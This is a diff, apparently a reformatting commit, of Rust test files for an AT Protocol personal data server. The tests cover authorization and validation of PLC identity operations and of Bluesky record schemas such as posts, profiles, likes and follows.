··· 7 7 #[tokio::test] 8 8 async fn test_plc_operation_auth() { 9 9 let client = client(); 10 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 11 - .send().await.unwrap(); 10 + let res = client 11 + .post(format!( 12 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 13 + base_url().await 14 + )) 15 + .send() 16 + .await 17 + .unwrap(); 12 18 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 13 - let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 14 - .json(&json!({})).send().await.unwrap(); 19 + let res = client 20 + .post(format!( 21 + "{}/xrpc/com.atproto.identity.signPlcOperation", 22 + base_url().await 23 + )) 24 + .json(&json!({})) 25 + .send() 26 + .await 27 + .unwrap(); 15 28 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 16 - let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 17 - .json(&json!({ "operation": {} })).send().await.unwrap(); 29 + let res = client 30 + .post(format!( 31 + "{}/xrpc/com.atproto.identity.submitPlcOperation", 32 + base_url().await 33 + )) 34 + .json(&json!({ "operation": {} })) 35 + .send() 36 + .await 37 + .unwrap(); 18 38 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 19 39 let (token, _) = create_account_and_login(&client).await; 20 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 21 - .bearer_auth(&token).send().await.unwrap(); 40 + let res = client 41 + .post(format!( 42 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 43 + base_url().await 44 + )) 45 + .bearer_auth(&token) 46 + .send() 47 + .await 48 + .unwrap(); 22 49 assert_eq!(res.status(), StatusCode::OK); 23 50 } 24 51 ··· 26 53 async fn test_sign_plc_operation_validation() { 27 54 let client = client(); 28 55 let (token, _) = create_account_and_login(&client).await; 29 - let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 30 - .bearer_auth(&token).json(&json!({})).send().await.unwrap(); 56 + let res = client 57 + .post(format!( 58 + "{}/xrpc/com.atproto.identity.signPlcOperation", 59 + base_url().await 60 + )) 61 + .bearer_auth(&token) 62 + .json(&json!({})) 63 + .send() 64 + .await 65 + .unwrap(); 31 66 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 32 67 let body: serde_json::Value = res.json().await.unwrap(); 33 68 assert_eq!(body["error"], "InvalidRequest"); 34 - let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 35 - .bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap(); 69 + let res = client 70 + .post(format!( 71 + "{}/xrpc/com.atproto.identity.signPlcOperation", 72 + base_url().await 73 + )) 74 + .bearer_auth(&token) 75 + .json(&json!({ "token": "invalid-token-12345" })) 76 + .send() 77 + .await 78 + .unwrap(); 36 79 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 37 80 let body: serde_json::Value = res.json().await.unwrap(); 38 81 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); ··· 42 85 async fn test_submit_plc_operation_validation() { 43 86 let client = client(); 44 87 let (token, did) = create_account_and_login(&client).await; 45 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 46 - let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 47 - .bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap(); 88 + let hostname = 89 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 90 + let res = client 91 + .post(format!( 92 + "{}/xrpc/com.atproto.identity.submitPlcOperation", 93 + base_url().await 94 + )) 95 + .bearer_auth(&token) 96 + .json(&json!({ "operation": { "type": "invalid_type" } })) 97 + .send() 98 + .await 99 + .unwrap(); 48 100 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 49 101 let body: serde_json::Value = res.json().await.unwrap(); 50 102 assert_eq!(body["error"], "InvalidRequest"); 51 - let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 52 - .bearer_auth(&token).json(&json!({ 103 + let res = client 104 + .post(format!( 105 + "{}/xrpc/com.atproto.identity.submitPlcOperation", 106 + base_url().await 107 + )) 108 + .bearer_auth(&token) 109 + .json(&json!({ 53 110 "operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 54 111 "alsoKnownAs": [], "services": {}, "prev": null } 55 - })).send().await.unwrap(); 112 + })) 113 + .send() 114 + .await 115 + .unwrap(); 56 116 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 57 117 let handle = did.split(':').last().unwrap_or("user"); 58 118 let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) ··· 75 135 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 76 136 let body: serde_json::Value = res.json().await.unwrap(); 77 137 assert_eq!(body["error"], "InvalidRequest"); 78 - assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation")); 138 + assert!( 139 + body["message"] 140 + .as_str() 141 + .unwrap_or("") 142 + .contains("signing key") 143 + || body["message"].as_str().unwrap_or("").contains("rotation") 144 + ); 79 145 let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 80 146 .bearer_auth(&token).json(&json!({ 81 147 "operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"], ··· 100 166 async fn test_plc_token_lifecycle() { 101 167 let client = client(); 102 168 let (token, did) = create_account_and_login(&client).await; 103 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 104 - .bearer_auth(&token).send().await.unwrap(); 169 + let res = client 170 + .post(format!( 171 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 172 + base_url().await 173 + )) 174 + .bearer_auth(&token) 175 + .send() 176 + .await 177 + .unwrap(); 105 178 assert_eq!(res.status(), StatusCode::OK); 106 179 let db_url = get_db_connection_string().await; 107 180 let pool = PgPool::connect(&db_url).await.unwrap(); ··· 113 186 let row = row.unwrap(); 114 187 assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx"); 115 188 assert!(row.token.contains('-'), "Token should contain hyphen"); 116 - assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired"); 189 + assert!( 190 + row.expires_at > chrono::Utc::now(), 191 + "Token should not be expired" 192 + ); 117 193 let diff = row.expires_at - chrono::Utc::now(); 118 - assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes"); 194 + assert!( 195 + diff.num_minutes() >= 9 && diff.num_minutes() <= 11, 196 + "Token should expire in ~10 minutes" 197 + ); 119 198 let token1 = row.token.clone(); 120 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 121 - .bearer_auth(&token).send().await.unwrap(); 199 + let res = client 200 + .post(format!( 201 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 202 + base_url().await 203 + )) 204 + .bearer_auth(&token) 205 + .send() 206 + .await 207 + .unwrap(); 122 208 assert_eq!(res.status(), StatusCode::OK); 123 209 let token2 = sqlx::query_scalar!( 124 210 "SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
+126 -40
tests/plc_validation.rs
··· 1 + use k256::ecdsa::SigningKey; 2 + use serde_json::json; 3 + use std::collections::HashMap; 1 4 use tranquil_pds::plc::{ 2 5 PlcError, PlcOperation, PlcService, PlcValidationContext, cid_for_cbor, sign_operation, 3 6 signing_key_to_did_key, validate_plc_operation, validate_plc_operation_for_submission, 4 7 verify_operation_signature, 5 8 }; 6 - use k256::ecdsa::SigningKey; 7 - use serde_json::json; 8 - use std::collections::HashMap; 9 9 10 10 fn create_valid_operation() -> serde_json::Value { 11 11 let key = SigningKey::random(&mut rand::thread_rng()); ··· 32 32 assert!(validate_plc_operation(&op).is_ok()); 33 33 34 34 let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 35 - assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 35 + assert!( 36 + matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")) 37 + ); 36 38 37 39 let invalid_type = json!({ "type": "invalid_type", "sig": "test" }); 38 - assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 40 + assert!( 41 + matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")) 42 + ); 39 43 40 44 let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 41 - assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 45 + assert!( 46 + matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")) 47 + ); 42 48 43 49 let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 44 - assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 50 + assert!( 51 + matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")) 52 + ); 45 53 46 54 let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" }); 47 - assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 55 + assert!( 56 + matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")) 57 + ); 48 58 49 59 let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" }); 50 - assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 60 + assert!( 61 + matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")) 62 + ); 51 63 52 64 let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" }); 53 - assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 65 + assert!( 66 + matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services")) 67 + ); 54 68 55 - assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_)))); 69 + assert!(matches!( 70 + validate_plc_operation(&json!("not an object")), 71 + Err(PlcError::InvalidResponse(_)) 72 + )); 56 73 } 57 74 58 75 #[test] ··· 61 78 let did_key = signing_key_to_did_key(&key); 62 79 let server_key = "did:key:zServer123"; 63 80 64 - let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({ 65 - "type": "plc_operation", 66 - "rotationKeys": [rotation_key], 67 - "verificationMethods": {"atproto": signing_key}, 68 - "alsoKnownAs": [format!("at://{}", handle)], 69 - "services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } }, 70 - "sig": "test" 71 - }); 81 + let base_op = |rotation_key: &str, 82 + signing_key: &str, 83 + handle: &str, 84 + service_type: &str, 85 + endpoint: &str| { 86 + json!({ 87 + "type": "plc_operation", 88 + "rotationKeys": [rotation_key], 89 + "verificationMethods": {"atproto": signing_key}, 90 + "alsoKnownAs": [format!("at://{}", handle)], 91 + "services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } }, 92 + "sig": "test" 93 + }) 94 + }; 72 95 73 96 let ctx = PlcValidationContext { 74 97 server_rotation_key: server_key.to_string(), ··· 77 100 expected_pds_endpoint: "https://pds.example.com".to_string(), 78 101 }; 79 102 80 - let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 81 - assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 103 + let op = base_op( 104 + &did_key, 105 + &did_key, 106 + "test.handle", 107 + "AtprotoPersonalDataServer", 108 + "https://pds.example.com", 109 + ); 110 + assert!( 111 + matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")) 112 + ); 82 113 83 114 let ctx_with_user_key = PlcValidationContext { 84 115 server_rotation_key: did_key.clone(), ··· 87 118 expected_pds_endpoint: "https://pds.example.com".to_string(), 88 119 }; 89 120 90 - let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 91 - assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 121 + let wrong_signing = base_op( 122 + &did_key, 123 + "did:key:zWrongKey", 124 + "test.handle", 125 + "AtprotoPersonalDataServer", 126 + "https://pds.example.com", 127 + ); 128 + assert!( 129 + matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")) 130 + ); 92 131 93 - let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 94 - assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 132 + let wrong_handle = base_op( 133 + &did_key, 134 + &did_key, 135 + "wrong.handle", 136 + "AtprotoPersonalDataServer", 137 + "https://pds.example.com", 138 + ); 139 + assert!( 140 + matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")) 141 + ); 95 142 96 - let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com"); 97 - assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 143 + let wrong_service_type = base_op( 144 + &did_key, 145 + &did_key, 146 + "test.handle", 147 + "WrongServiceType", 148 + "https://pds.example.com", 149 + ); 150 + assert!( 151 + matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type")) 152 + ); 98 153 99 - let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com"); 100 - assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 154 + let wrong_endpoint = base_op( 155 + &did_key, 156 + &did_key, 157 + "test.handle", 158 + "AtprotoPersonalDataServer", 159 + "https://wrong.endpoint.com", 160 + ); 161 + assert!( 162 + matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")) 163 + ); 101 164 } 102 165 103 166 #[test] ··· 121 184 assert!(result.is_ok() && !result.unwrap()); 122 185 123 186 let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 124 - assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 187 + assert!( 188 + matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")) 189 + ); 125 190 126 191 let invalid_base64 = json!({ 127 192 "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 128 193 "alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!" 129 194 }); 130 - assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_)))); 195 + assert!(matches!( 196 + verify_operation_signature(&invalid_base64, &[]), 197 + Err(PlcError::InvalidResponse(_)) 198 + )); 131 199 } 132 200 133 201 #[test] ··· 136 204 let cid1 = cid_for_cbor(&value).unwrap(); 137 205 let cid2 = cid_for_cbor(&value).unwrap(); 138 206 assert_eq!(cid1, cid2, "CID should be deterministic"); 139 - assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256"); 207 + assert!( 208 + cid1.starts_with("bafyrei"), 209 + "CID should be dag-cbor + sha256" 210 + ); 140 211 141 212 let value2 = json!({ "alpha": 999 }); 142 213 let cid3 = cid_for_cbor(&value2).unwrap(); ··· 145 216 let key = SigningKey::random(&mut rand::thread_rng()); 146 217 let did = signing_key_to_did_key(&key); 147 218 assert!(did.starts_with("did:key:z") && did.len() > 50); 148 - assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did"); 219 + assert_eq!( 220 + did, 221 + signing_key_to_did_key(&key), 222 + "Same key should produce same did" 223 + ); 149 224 150 225 let key2 = SigningKey::random(&mut rand::thread_rng()); 151 - assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids"); 226 + assert_ne!( 227 + did, 228 + signing_key_to_did_key(&key2), 229 + "Different keys should produce different dids" 230 + ); 152 231 } 153 232 154 233 #[test] 155 234 fn test_tombstone_operations() { 156 - let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" }); 235 + let tombstone = 236 + json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" }); 157 237 assert!(validate_plc_operation(&tombstone).is_ok()); 158 238 159 239 let key = SigningKey::random(&mut rand::thread_rng()); ··· 175 255 "alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature" 176 256 }); 177 257 let signed = sign_operation(&op, &key).unwrap(); 178 - assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature"); 258 + assert_ne!( 259 + signed.get("sig").and_then(|v| v.as_str()).unwrap(), 260 + "old_signature" 261 + ); 179 262 180 263 let mut services = HashMap::new(); 181 - services.insert("atproto_pds".to_string(), PlcService { 182 - service_type: "AtprotoPersonalDataServer".to_string(), 183 - endpoint: "https://pds.example.com".to_string(), 184 - }); 264 + services.insert( 265 + "atproto_pds".to_string(), 266 + PlcService { 267 + service_type: "AtprotoPersonalDataServer".to_string(), 268 + endpoint: "https://pds.example.com".to_string(), 269 + }, 270 + ); 185 271 let mut verification_methods = HashMap::new(); 186 272 verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string()); 187 273 let op = PlcOperation {
+191 -44
tests/record_validation.rs
··· 1 + use serde_json::json; 1 2 use tranquil_pds::validation::{ 2 3 RecordValidator, ValidationError, ValidationStatus, validate_collection_nsid, 3 4 validate_record_key, 4 5 }; 5 - use serde_json::json; 6 6 7 7 fn now() -> String { 8 8 chrono::Utc::now().to_rfc3339() ··· 17 17 "text": "Hello world!", 18 18 "createdAt": now() 19 19 }); 20 - assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 20 + assert_eq!( 21 + validator 22 + .validate(&valid_post, "app.bsky.feed.post") 23 + .unwrap(), 24 + ValidationStatus::Valid 25 + ); 21 26 22 27 let missing_text = json!({ 23 28 "$type": "app.bsky.feed.post", 24 29 "createdAt": now() 25 30 }); 26 - assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text")); 31 + assert!( 32 + matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text") 33 + ); 27 34 28 35 let missing_created_at = json!({ 29 36 "$type": "app.bsky.feed.post", 30 37 "text": "Hello" 31 38 }); 32 - assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt")); 39 + assert!( 40 + matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt") 41 + ); 33 42 34 43 let text_too_long = json!({ 35 44 "$type": "app.bsky.feed.post", 36 45 "text": "a".repeat(3001), 37 46 "createdAt": now() 38 47 }); 39 - assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text")); 48 + assert!( 49 + matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text") 50 + ); 40 51 41 52 let text_at_limit = json!({ 42 53 "$type": "app.bsky.feed.post", 43 54 "text": "a".repeat(3000), 44 55 "createdAt": now() 45 56 }); 46 - assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 57 + assert_eq!( 58 + validator 59 + .validate(&text_at_limit, "app.bsky.feed.post") 60 + .unwrap(), 61 + ValidationStatus::Valid 62 + ); 47 63 48 64 let too_many_langs = json!({ 49 65 "$type": "app.bsky.feed.post", ··· 51 67 "createdAt": now(), 52 68 "langs": ["en", "fr", "de", "es"] 53 69 }); 54 - assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 70 + assert!( 71 + matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs") 72 + ); 55 73 56 74 let three_langs_ok = json!({ 57 75 "$type": "app.bsky.feed.post", ··· 59 77 "createdAt": now(), 60 78 "langs": ["en", "fr", "de"] 61 79 }); 62 - assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 80 + assert_eq!( 81 + validator 82 + .validate(&three_langs_ok, "app.bsky.feed.post") 83 + .unwrap(), 84 + ValidationStatus::Valid 85 + ); 63 86 64 87 let too_many_tags = json!({ 65 88 "$type": "app.bsky.feed.post", ··· 67 90 "createdAt": now(), 68 91 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"] 69 92 }); 70 - assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 93 + assert!( 94 + matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags") 95 + ); 71 96 72 97 let eight_tags_ok = json!({ 73 98 "$type": "app.bsky.feed.post", ··· 75 100 "createdAt": now(), 76 101 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"] 77 102 }); 78 - assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 103 + assert_eq!( 104 + validator 105 + .validate(&eight_tags_ok, "app.bsky.feed.post") 106 + .unwrap(), 107 + ValidationStatus::Valid 108 + ); 79 109 80 110 let tag_too_long = json!({ 81 111 "$type": "app.bsky.feed.post", ··· 83 113 "createdAt": now(), 84 114 "tags": ["t".repeat(641)] 85 115 }); 86 - assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 116 + assert!( 117 + matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")) 118 + ); 87 119 } 88 120 89 121 #[test] ··· 95 127 "displayName": "Test User", 96 128 "description": "A test user profile" 97 129 }); 98 - assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid); 130 + assert_eq!( 131 + validator 132 + .validate(&valid, "app.bsky.actor.profile") 133 + .unwrap(), 134 + ValidationStatus::Valid 135 + ); 99 136 100 137 let empty_ok = json!({ 101 138 "$type": "app.bsky.actor.profile" 102 139 }); 103 - assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid); 140 + assert_eq!( 141 + validator 142 + .validate(&empty_ok, "app.bsky.actor.profile") 143 + .unwrap(), 144 + ValidationStatus::Valid 145 + ); 104 146 105 147 let displayname_too_long = json!({ 106 148 "$type": "app.bsky.actor.profile", 107 149 "displayName": "n".repeat(641) 108 150 }); 109 - assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 151 + assert!( 152 + matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 153 + ); 110 154 111 155 let description_too_long = json!({ 112 156 "$type": "app.bsky.actor.profile", 113 157 "description": "d".repeat(2561) 114 158 }); 115 - assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description")); 159 + assert!( 160 + matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description") 161 + ); 116 162 } 117 163 118 164 #[test] ··· 127 173 }, 128 174 "createdAt": now() 129 175 }); 130 - assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid); 176 + assert_eq!( 177 + validator 178 + .validate(&valid_like, "app.bsky.feed.like") 179 + .unwrap(), 180 + ValidationStatus::Valid 181 + ); 131 182 132 183 let missing_subject = json!({ 133 184 "$type": "app.bsky.feed.like", 134 185 "createdAt": now() 135 186 }); 136 - assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject")); 187 + assert!( 188 + matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject") 189 + ); 137 190 138 191 let missing_subject_uri = json!({ 139 192 "$type": "app.bsky.feed.like", ··· 142 195 }, 143 196 "createdAt": now() 144 197 }); 145 - assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri"))); 198 + assert!( 199 + matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri")) 200 + ); 146 201 147 202 let invalid_subject_uri = json!({ 148 203 "$type": "app.bsky.feed.like", ··· 152 207 }, 153 208 "createdAt": now() 154 209 }); 155 - assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 210 + assert!( 211 + matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")) 212 + ); 156 213 157 214 let valid_repost = json!({ 158 215 "$type": "app.bsky.feed.repost", ··· 162 219 }, 163 220 "createdAt": now() 164 221 }); 165 - assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid); 222 + assert_eq!( 223 + validator 224 + .validate(&valid_repost, "app.bsky.feed.repost") 225 + .unwrap(), 226 + ValidationStatus::Valid 227 + ); 166 228 167 229 let repost_missing_subject = json!({ 168 230 "$type": "app.bsky.feed.repost", 169 231 "createdAt": now() 170 232 }); 171 - assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject")); 233 + assert!( 234 + matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject") 235 + ); 172 236 } 173 237 174 238 #[test] ··· 180 244 "subject": "did:plc:test12345", 181 245 "createdAt": now() 182 246 }); 183 - assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid); 247 + assert_eq!( 248 + validator 249 + .validate(&valid_follow, "app.bsky.graph.follow") 250 + .unwrap(), 251 + ValidationStatus::Valid 252 + ); 184 253 185 254 let missing_follow_subject = json!({ 186 255 "$type": "app.bsky.graph.follow", 187 256 "createdAt": now() 188 257 }); 189 - assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject")); 258 + assert!( 259 + matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject") 260 + ); 190 261 191 262 let invalid_follow_subject = json!({ 192 263 "$type": "app.bsky.graph.follow", 193 264 "subject": "not-a-did", 194 265 "createdAt": now() 195 266 }); 196 - assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 267 + assert!( 268 + matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject") 269 + ); 197 270 198 271 let valid_block = json!({ 199 272 "$type": "app.bsky.graph.block", 200 273 "subject": "did:plc:blocked123", 201 274 "createdAt": now() 202 275 }); 203 - assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid); 276 + assert_eq!( 277 + validator 278 + .validate(&valid_block, "app.bsky.graph.block") 279 + .unwrap(), 280 + ValidationStatus::Valid 281 + ); 204 282 205 283 let invalid_block_subject = json!({ 206 284 "$type": "app.bsky.graph.block", 207 285 "subject": "not-a-did", 208 286 "createdAt": now() 209 287 }); 210 - assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 288 + assert!( 289 + matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject") 290 + ); 